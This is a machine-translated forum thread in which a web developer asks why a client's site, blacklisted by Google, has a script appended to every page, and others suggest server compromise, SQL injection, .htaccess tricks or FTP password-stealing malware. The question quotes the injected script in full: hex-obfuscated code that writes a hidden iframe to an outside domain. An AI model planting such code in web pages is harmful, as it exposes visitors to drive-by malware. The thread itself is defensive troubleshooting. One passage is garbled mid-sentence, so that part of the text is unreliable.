Javascript 客户'；他的网站被攻击了，eeek！

嗯，我想这一天一定会到来

我客户的网站已经被谷歌泄露并列入黑名单。加载主页面时，此javascript会自动添加到文档底部：

<script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=382" style="visibility: hidden;"></'+str3+'rame>');</script></head><body><iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>

var str='google-analytics.com'；变量str2='6b756c6b61726e696f6f37312e636f6d'；str4='php'；var str3='if'；str=''；对于（var i=0；i，恶意HTTP模块（在IIS中）或apache的任何等效模块都可以为任何HTTP请求（即使是静态文件）预加、附加或修改内容。这表明服务器本身已受到破坏

编辑：如果您让我们知道您使用的是哪种类型的web服务器，我们将能够为故障排除提供更具体的建议。
您是否提供SQL数据库中的任何内容？可能是SQL注入攻击造成的危害，并且您在数据库中的网站内容已被此脚本/标记替换/修改。
是否你确定该漏洞在你的机器上不是本地的，并且有本地的东西正在将HTML注入你的webbrowser，这会导致你的浏览器执行JS吗

最好使用和运行可靠的本地扫描。如果您不想安装NOD32，因为它可能与您当前的AV冲突，您可以使用，这是一个作为程序运行的AV扫描仪，不会干扰或需要重新启动

还可以在web服务器上运行扫描。我还看到有人在其他论坛上发布了相关信息，如。
您是否允许用户输入任何html？可能是未正确过滤的内容。
是否与.htaccess有关

php_value auto_append_file /server/path/to/my/www_root/subdir/file.ext" 

可以自动将文件附加到文档底部。但是如果您无法使用该JS识别文件，那么我想这不太可能。您是否了解过他们可能是如何做到这一点的？
我建议您查看日志文件。通过web的每一次访问都应该记录在那里。
我们在其中一次访问中遇到了类似的问题我们的客户大约一年前

结果表明，客户端使用的FTP客户端以明文形式保存了密码，系统感染了一种病毒，该病毒专门扫描系统中的这些密码文件，以覆盖文件中保存的主机的源代码

有关更多信息，请参阅。您会发现它与您遇到的问题非常相似

我们的解决方案是鼓励我们的客户不要保存密码，或者使用加密密码的FTP客户机。
如果被谷歌列入黑名单，这不意味着其他访问者也会被列入黑名单吗？黑名单的好处是，看起来你需要在web服务器上运行AV扫描，并找到感染的位置tion正在隐藏。是的，在web服务器上运行AV扫描也是一个好主意。你有没有搞清楚这件事，我很想知道？Kev：几乎可以肯定，这是对web服务器的一种改变，让它在提供服务的每一页上提交此页脚。